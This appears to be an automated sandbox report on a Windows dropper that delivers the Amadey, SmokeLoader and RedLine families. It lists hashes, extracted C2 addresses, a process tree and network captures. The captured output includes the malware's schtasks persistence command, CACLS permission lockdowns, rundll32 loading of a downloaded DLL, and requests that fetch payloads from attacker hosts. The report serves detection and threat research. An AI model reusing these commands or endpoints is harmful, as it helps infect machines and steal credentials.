Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/07/2023, 08:25 UTC

General

  • Target

    5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49.exe

  • Size

    515KB

  • MD5

    b7ab36f74e03f4816e4b3f20c3fe44d9

  • SHA1

    ad674a4b50f0bebf4a4449b49d9e55b0ee14ce5b

  • SHA256

    5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49

  • SHA512

    0c857ce4ad3294f92277efc9929b4d3878aa35ad5c540ff335aed2710680705aa93c8986a989fc55c05aa8d1c494b2e36ee8c8480ab80b05bd6ccca3d7db16b1

  • SSDEEP

    12288:MMrjy90z7gLOxot1zlloh1911yKLSbBf/iYvR1:/y67gLoQzlQ11XelniYZ1

Malware Config

Extracted

Family

amadey

Version

3.85

C2

77.91.68.3/home/love/index.php

Extracted

Family

smokeloader

Version

2022

C2

http://77.91.68.29/fks/

rc4.i32
1
0x4b3b02b6
rc4.i32
1
0x6ea683ed

Extracted

Family

redline

Botnet

news

C2

77.91.68.68:19071

Attributes
  • auth_value

    99ba2ffe8d72ebe9fdc7e758c94db148

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 3 IoCs
  • Windows security modification 2 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49.exe
    "C:\Users\Admin\AppData\Local\Temp\5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4940
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v2070713.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v2070713.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:4880
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v9599233.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v9599233.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:4208
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a6700421.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a6700421.exe
          4⤵
          • Modifies Windows Defender Real-time Protection settings
          • Executes dropped EXE
          • Windows security modification
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1328
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b2546604.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b2546604.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:864
          • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
            "C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4288
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
              6⤵
              • Creates scheduled task(s)
              PID:5036
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "danke.exe" /P "Admin:N"&&CACLS "danke.exe" /P "Admin:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "Admin:N"&&CACLS "..\3ec1f323b5" /P "Admin:R" /E&&Exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3748
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                7⤵
                  PID:376
                • C:\Windows\SysWOW64\cacls.exe
                  CACLS "danke.exe" /P "Admin:N"
                  7⤵
                    PID:3424
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "danke.exe" /P "Admin:R" /E
                    7⤵
                      PID:1796
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      7⤵
                        PID:1036
                      • C:\Windows\SysWOW64\cacls.exe
                        CACLS "..\3ec1f323b5" /P "Admin:N"
                        7⤵
                          PID:3240
                        • C:\Windows\SysWOW64\cacls.exe
                          CACLS "..\3ec1f323b5" /P "Admin:R" /E
                          7⤵
                            PID:872
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                          6⤵
                          • Loads dropped DLL
                          PID:3564
                  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c2155687.exe
                    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c2155687.exe
                    3⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    PID:4444
                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d1212362.exe
                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d1212362.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2304
              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
                C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
                1⤵
                • Executes dropped EXE
                PID:3908
              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
                C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
                1⤵
                • Executes dropped EXE
                PID:1752
              • C:\Users\Admin\AppData\Local\Temp\EFD9.exe
                C:\Users\Admin\AppData\Local\Temp\EFD9.exe
                1⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                PID:1740
                • C:\Windows\SysWOW64\control.exe
                  "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\55CJ.CPL",
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1560
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\55CJ.CPL",
                    3⤵
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1756
                    • C:\Windows\system32\RunDll32.exe
                      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\55CJ.CPL",
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4704
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\55CJ.CPL",
                        5⤵
                        • Loads dropped DLL
                        PID:688
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe start wuauserv
                1⤵
                • Launches sc.exe
                PID:1976
              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
                C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
                1⤵
                • Executes dropped EXE
                PID:5048

              Network

              • flag-us
                DNS
                68.32.126.40.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                68.32.126.40.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                158.240.127.40.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                158.240.127.40.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                95.221.229.192.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                95.221.229.192.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                9.228.82.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                9.228.82.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                164.113.222.173.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                164.113.222.173.in-addr.arpa
                IN PTR
                Response
                164.113.222.173.in-addr.arpa
                IN PTR
                a173-222-113-164deploystaticakamaitechnologiescom
              • flag-us
                DNS
                26.35.223.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                26.35.223.20.in-addr.arpa
                IN PTR
                Response
              • flag-fi
                POST
                http://77.91.68.3/home/love/index.php
                danke.exe
                Remote address:
                77.91.68.3:80
                Request
                POST /home/love/index.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: 77.91.68.3
                Content-Length: 89
                Cache-Control: no-cache
                Response
                HTTP/1.1 200 OK
                Date: Mon, 24 Jul 2023 08:25:53 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 6
                Content-Type: text/html; charset=UTF-8
              • flag-us
                DNS
                3.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                3.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                3.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                3.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                3.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                3.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-fi
                POST
                http://77.91.68.29/fks/
                Remote address:
                77.91.68.29:80
                Request
                POST /fks/ HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://tnagofb.org/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 123
                Host: 77.91.68.29
                Response
                HTTP/1.1 404 Not Found
                Date: Mon, 24 Jul 2023 08:26:13 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 7
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=utf-8
              • flag-fi
                POST
                http://77.91.68.29/fks/
                Remote address:
                77.91.68.29:80
                Request
                POST /fks/ HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://jttdukeia.net/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 290
                Host: 77.91.68.29
                Response
                HTTP/1.1 404 Not Found
                Date: Mon, 24 Jul 2023 08:26:13 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 47
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=utf-8
              • flag-us
                DNS
                29.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                29.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                29.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                29.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                29.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                29.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-fi
                POST
                http://77.91.68.29/fks/
                Remote address:
                77.91.68.29:80
                Request
                POST /fks/ HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://mdxmyv.net/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 159
                Host: 77.91.68.29
                Response
                HTTP/1.1 404 Not Found
                Date: Mon, 24 Jul 2023 08:26:34 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 47
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=utf-8
              • flag-fi
                GET
                http://77.91.68.3/home/love/Plugins/cred64.dll
                danke.exe
                Remote address:
                77.91.68.3:80
                Request
                GET /home/love/Plugins/cred64.dll HTTP/1.1
                Host: 77.91.68.3
                Response
                HTTP/1.1 404 Not Found
                Date: Mon, 24 Jul 2023 08:26:43 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 272
                Content-Type: text/html; charset=iso-8859-1
              • flag-fi
                GET
                http://77.91.68.3/home/love/Plugins/clip64.dll
                danke.exe
                Remote address:
                77.91.68.3:80
                Request
                GET /home/love/Plugins/clip64.dll HTTP/1.1
                Host: 77.91.68.3
                Response
                HTTP/1.1 200 OK
                Date: Mon, 24 Jul 2023 08:26:43 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Last-Modified: Thu, 06 Jul 2023 18:47:56 GMT
                ETag: "16400-5ffd5f45b7dbc"
                Accept-Ranges: bytes
                Content-Length: 91136
                Content-Type: application/x-msdos-program
              • flag-us
                DNS
                57.169.31.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                57.169.31.20.in-addr.arpa
                IN PTR
                Response
              • flag-fi
                POST
                http://77.91.68.29/fks/
                Remote address:
                77.91.68.29:80
                Request
                POST /fks/ HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://ppfsa.org/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 229
                Host: 77.91.68.29
                Response
                HTTP/1.1 404 Not Found
                Date: Mon, 24 Jul 2023 08:26:55 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 43
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=utf-8
              • flag-us
                DNS
                0.77.109.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                0.77.109.52.in-addr.arpa
                IN PTR
                Response
              • flag-fi
                POST
                http://77.91.68.29/fks/
                Remote address:
                77.91.68.29:80
                Request
                POST /fks/ HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://jcgkpxrtkm.org/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 150
                Host: 77.91.68.29
                Response
                HTTP/1.1 404 Not Found
                Date: Mon, 24 Jul 2023 08:27:16 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 45
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=utf-8
              • flag-fi
                POST
                http://77.91.68.29/fks/
                Remote address:
                77.91.68.29:80
                Request
                POST /fks/ HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                Accept: */*
                Referer: http://ovhvhbxf.com/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Content-Length: 313
                Host: 77.91.68.29
                Response
                HTTP/1.1 404 Not Found
                Date: Mon, 24 Jul 2023 08:27:17 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 403
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=utf-8
              • flag-fi
                GET
                http://77.91.68.30/fuzz/raman.exe
                Remote address:
                77.91.68.30:80
                Request
                GET /fuzz/raman.exe HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Host: 77.91.68.30
                Response
                HTTP/1.1 200 OK
                Date: Mon, 24 Jul 2023 08:27:16 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Last-Modified: Mon, 24 Jul 2023 07:59:57 GMT
                ETag: "16b3b6-60137001d1940"
                Accept-Ranges: bytes
                Content-Length: 1487798
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/x-msdos-program
              • flag-us
                DNS
                30.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                30.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                30.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                30.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                30.68.91.77.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                30.68.91.77.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                200.74.101.95.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                200.74.101.95.in-addr.arpa
                IN PTR
                Response
                200.74.101.95.in-addr.arpa
                IN PTR
                a95-101-74-200deploystaticakamaitechnologiescom
              • flag-us
                DNS
                209.143.182.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                209.143.182.52.in-addr.arpa
                IN PTR
                Response
              • 77.91.68.3:80
                http://77.91.68.3/home/love/index.php
                http
                danke.exe
                515 B
                365 B
                6
                5

                HTTP Request

                POST http://77.91.68.3/home/love/index.php

                HTTP Response

                200
              • 77.91.68.68:19071
                d1212362.exe
                260 B
                5
              • 77.91.68.29:80
                http://77.91.68.29/fks/
                http
                1.3kB
                846 B
                9
                9

                HTTP Request

                POST http://77.91.68.29/fks/

                HTTP Response

                404

                HTTP Request

                POST http://77.91.68.29/fks/

                HTTP Response

                404
              • 77.91.124.31:80
                260 B
                5
              • 77.91.68.68:19071
                d1212362.exe
                260 B
                5
              • 77.91.68.29:80
                http://77.91.68.29/fks/
                http
                741 B
                510 B
                7
                6

                HTTP Request

                POST http://77.91.68.29/fks/

                HTTP Response

                404
              • 77.91.124.31:80
                260 B
                5
              • 77.91.68.3:80
                http://77.91.68.3/home/love/Plugins/clip64.dll
                http
                danke.exe
                3.8kB
                94.8kB
                75
                74

                HTTP Request

                GET http://77.91.68.3/home/love/Plugins/cred64.dll

                HTTP Response

                404

                HTTP Request

                GET http://77.91.68.3/home/love/Plugins/clip64.dll

                HTTP Response

                200
              • 77.91.68.68:19071
                d1212362.exe
                260 B
                5
              • 77.91.68.29:80
                http://77.91.68.29/fks/
                http
                810 B
                506 B
                7
                6

                HTTP Request

                POST http://77.91.68.29/fks/

                HTTP Response

                404
              • 77.91.124.31:80
                260 B
                5
              • 77.91.68.29:80
                http://77.91.68.29/fks/
                http
                1.4kB
                1.2kB
                10
                9

                HTTP Request

                POST http://77.91.68.29/fks/

                HTTP Response

                404

                HTTP Request

                POST http://77.91.68.29/fks/

                HTTP Response

                404
              • 77.91.68.30:80
                http://77.91.68.30/fuzz/raman.exe
                http
                47.0kB
                1.5MB
                939
                1100

                HTTP Request

                GET http://77.91.68.30/fuzz/raman.exe

                HTTP Response

                200
              • 77.91.68.68:19071
                d1212362.exe
                260 B
                5
              • 77.91.68.68:19071
                d1212362.exe
                260 B
                5
              • 8.8.8.8:53
                68.32.126.40.in-addr.arpa
                dns
                71 B
                157 B
                1
                1

                DNS Request

                68.32.126.40.in-addr.arpa

              • 8.8.8.8:53
                158.240.127.40.in-addr.arpa
                dns
                73 B
                147 B
                1
                1

                DNS Request

                158.240.127.40.in-addr.arpa

              • 8.8.8.8:53
                95.221.229.192.in-addr.arpa
                dns
                73 B
                144 B
                1
                1

                DNS Request

                95.221.229.192.in-addr.arpa

              • 8.8.8.8:53
                9.228.82.20.in-addr.arpa
                dns
                70 B
                156 B
                1
                1

                DNS Request

                9.228.82.20.in-addr.arpa

              • 8.8.8.8:53
                164.113.222.173.in-addr.arpa
                dns
                74 B
                141 B
                1
                1

                DNS Request

                164.113.222.173.in-addr.arpa

              • 8.8.8.8:53
                26.35.223.20.in-addr.arpa
                dns
                71 B
                157 B
                1
                1

                DNS Request

                26.35.223.20.in-addr.arpa

              • 8.8.8.8:53
                3.68.91.77.in-addr.arpa
                dns
                207 B
                207 B
                3
                3

                DNS Request

                3.68.91.77.in-addr.arpa

                DNS Request

                3.68.91.77.in-addr.arpa

                DNS Request

                3.68.91.77.in-addr.arpa

              • 8.8.8.8:53
                29.68.91.77.in-addr.arpa
                dns
                210 B
                210 B
                3
                3

                DNS Request

                29.68.91.77.in-addr.arpa

                DNS Request

                29.68.91.77.in-addr.arpa

                DNS Request

                29.68.91.77.in-addr.arpa

              • 8.8.8.8:53
                57.169.31.20.in-addr.arpa
                dns
                71 B
                157 B
                1
                1

                DNS Request

                57.169.31.20.in-addr.arpa

              • 8.8.8.8:53
                0.77.109.52.in-addr.arpa
                dns
                70 B
                144 B
                1
                1

                DNS Request

                0.77.109.52.in-addr.arpa

              • 8.8.8.8:53
                30.68.91.77.in-addr.arpa
                dns
                210 B
                210 B
                3
                3

                DNS Request

                30.68.91.77.in-addr.arpa

                DNS Request

                30.68.91.77.in-addr.arpa

                DNS Request

                30.68.91.77.in-addr.arpa

              • 8.8.8.8:53
                200.74.101.95.in-addr.arpa
                dns
                72 B
                137 B
                1
                1

                DNS Request

                200.74.101.95.in-addr.arpa

              • 8.8.8.8:53
                209.143.182.52.in-addr.arpa
                dns
                73 B
                147 B
                1
                1

                DNS Request

                209.143.182.52.in-addr.arpa

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe

                Filesize

                230KB

                MD5

                b18c8e4199ae72f19aa7276c177a8f67

                SHA1

                d27f0aded51fce63b81dcfd333f9c810c11e6c69

                SHA256

                f99f08ebd0ffdc31b720aedb7b0d2693918a5e205a01d7eda1237e3166dd78a0

                SHA512

                7f84215ce7599e8d2a88c37856ad8006a9aa1d2a2cba734a6797f60bd6f47ca13d62c01c94399f61bb7b94580b8db48d0c9f9d9e60740f304bec77b99f945f78

              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe

                Filesize

                230KB

                MD5

                b18c8e4199ae72f19aa7276c177a8f67

                SHA1

                d27f0aded51fce63b81dcfd333f9c810c11e6c69

                SHA256

                f99f08ebd0ffdc31b720aedb7b0d2693918a5e205a01d7eda1237e3166dd78a0

                SHA512

                7f84215ce7599e8d2a88c37856ad8006a9aa1d2a2cba734a6797f60bd6f47ca13d62c01c94399f61bb7b94580b8db48d0c9f9d9e60740f304bec77b99f945f78

              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe

                Filesize

                230KB

                MD5

                b18c8e4199ae72f19aa7276c177a8f67

                SHA1

                d27f0aded51fce63b81dcfd333f9c810c11e6c69

                SHA256

                f99f08ebd0ffdc31b720aedb7b0d2693918a5e205a01d7eda1237e3166dd78a0

                SHA512

                7f84215ce7599e8d2a88c37856ad8006a9aa1d2a2cba734a6797f60bd6f47ca13d62c01c94399f61bb7b94580b8db48d0c9f9d9e60740f304bec77b99f945f78

              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe

                Filesize

                230KB

                MD5

                b18c8e4199ae72f19aa7276c177a8f67

                SHA1

                d27f0aded51fce63b81dcfd333f9c810c11e6c69

                SHA256

                f99f08ebd0ffdc31b720aedb7b0d2693918a5e205a01d7eda1237e3166dd78a0

                SHA512

                7f84215ce7599e8d2a88c37856ad8006a9aa1d2a2cba734a6797f60bd6f47ca13d62c01c94399f61bb7b94580b8db48d0c9f9d9e60740f304bec77b99f945f78

              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe

                Filesize

                230KB

                MD5

                b18c8e4199ae72f19aa7276c177a8f67

                SHA1

                d27f0aded51fce63b81dcfd333f9c810c11e6c69

                SHA256

                f99f08ebd0ffdc31b720aedb7b0d2693918a5e205a01d7eda1237e3166dd78a0

                SHA512

                7f84215ce7599e8d2a88c37856ad8006a9aa1d2a2cba734a6797f60bd6f47ca13d62c01c94399f61bb7b94580b8db48d0c9f9d9e60740f304bec77b99f945f78

              • C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe

                Filesize

                230KB

                MD5

                b18c8e4199ae72f19aa7276c177a8f67

                SHA1

                d27f0aded51fce63b81dcfd333f9c810c11e6c69

                SHA256

                f99f08ebd0ffdc31b720aedb7b0d2693918a5e205a01d7eda1237e3166dd78a0

                SHA512

                7f84215ce7599e8d2a88c37856ad8006a9aa1d2a2cba734a6797f60bd6f47ca13d62c01c94399f61bb7b94580b8db48d0c9f9d9e60740f304bec77b99f945f78

              • C:\Users\Admin\AppData\Local\Temp\55CJ.CPL

                Filesize

                1.2MB

                MD5

                adf97e091cbdfeeaacad8339f3fe9c5c

                SHA1

                1595856f828350606e1e702b62e236e0b9a32463

                SHA256

                9c0c92915801a15089e32b6a1a2a6a1e3ee61b74444db99f45f897e62194e260

                SHA512

                79042235323fa2acd7f144fcd77177b4b9a42e83fe5940b693e3d4d40132b2afedec93c40bdfb188c49d293b6076f1631638e388ac36b624d4fbde8aff06cf80

              • C:\Users\Admin\AppData\Local\Temp\55cj.cpl

                Filesize

                1.2MB

                MD5

                adf97e091cbdfeeaacad8339f3fe9c5c

                SHA1

                1595856f828350606e1e702b62e236e0b9a32463

                SHA256

                9c0c92915801a15089e32b6a1a2a6a1e3ee61b74444db99f45f897e62194e260

                SHA512

                79042235323fa2acd7f144fcd77177b4b9a42e83fe5940b693e3d4d40132b2afedec93c40bdfb188c49d293b6076f1631638e388ac36b624d4fbde8aff06cf80

              • C:\Users\Admin\AppData\Local\Temp\55cj.cpl

                Filesize

                1.2MB

                MD5

                adf97e091cbdfeeaacad8339f3fe9c5c

                SHA1

                1595856f828350606e1e702b62e236e0b9a32463

                SHA256

                9c0c92915801a15089e32b6a1a2a6a1e3ee61b74444db99f45f897e62194e260

                SHA512

                79042235323fa2acd7f144fcd77177b4b9a42e83fe5940b693e3d4d40132b2afedec93c40bdfb188c49d293b6076f1631638e388ac36b624d4fbde8aff06cf80

              • C:\Users\Admin\AppData\Local\Temp\55cj.cpl

                Filesize

                1.2MB

                MD5

                adf97e091cbdfeeaacad8339f3fe9c5c

                SHA1

                1595856f828350606e1e702b62e236e0b9a32463

                SHA256

                9c0c92915801a15089e32b6a1a2a6a1e3ee61b74444db99f45f897e62194e260

                SHA512

                79042235323fa2acd7f144fcd77177b4b9a42e83fe5940b693e3d4d40132b2afedec93c40bdfb188c49d293b6076f1631638e388ac36b624d4fbde8aff06cf80

              • C:\Users\Admin\AppData\Local\Temp\EFD9.exe

                Filesize

                1.4MB

                MD5

                2bae0cec06270ae06cc1c32820500545

                SHA1

                28375e746ae37e67ec5fc055370cb78dbb89d34c

                SHA256

                b8975a410b3a3c22061bdef5c5555644e4f0d06bc45afc30d0fe3d7ca6fc4afe

                SHA512

                d047dd02ca90d3364be620483ee64e745106aeb8e5ee22f4bf5084dd726ff261a19378cce39f4d5d8821bd8716b48e8036f0da8e91cb9c258a785aac6583ae89

              • C:\Users\Admin\AppData\Local\Temp\EFD9.exe

                Filesize

                1.4MB

                MD5

                2bae0cec06270ae06cc1c32820500545

                SHA1

                28375e746ae37e67ec5fc055370cb78dbb89d34c

                SHA256

                b8975a410b3a3c22061bdef5c5555644e4f0d06bc45afc30d0fe3d7ca6fc4afe

                SHA512

                d047dd02ca90d3364be620483ee64e745106aeb8e5ee22f4bf5084dd726ff261a19378cce39f4d5d8821bd8716b48e8036f0da8e91cb9c258a785aac6583ae89

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d1212362.exe

                Filesize

                175KB

                MD5

                3117b9afd7caa08ba66ae1809e604d75

                SHA1

                68b5e1f4f8e163f168883cb145d2de670987498c

                SHA256

                7a5c2c0a9fc4fee4873518e6a95ef82afe4ed14bbe1dfdf5d99f857aa2721a9d

                SHA512

                a7757bfa2d77508198e81da84f9a631c5746e0f1e13a9f453772acf4364abc156ce403b147e5b144b5d092af3991ff94a73b51daa35083910ac04c837bfc83d2

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d1212362.exe

                Filesize

                175KB

                MD5

                3117b9afd7caa08ba66ae1809e604d75

                SHA1

                68b5e1f4f8e163f168883cb145d2de670987498c

                SHA256

                7a5c2c0a9fc4fee4873518e6a95ef82afe4ed14bbe1dfdf5d99f857aa2721a9d

                SHA512

                a7757bfa2d77508198e81da84f9a631c5746e0f1e13a9f453772acf4364abc156ce403b147e5b144b5d092af3991ff94a73b51daa35083910ac04c837bfc83d2

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v2070713.exe

                Filesize

                359KB

                MD5

                13ca6748445fd48841584247832b78d5

                SHA1

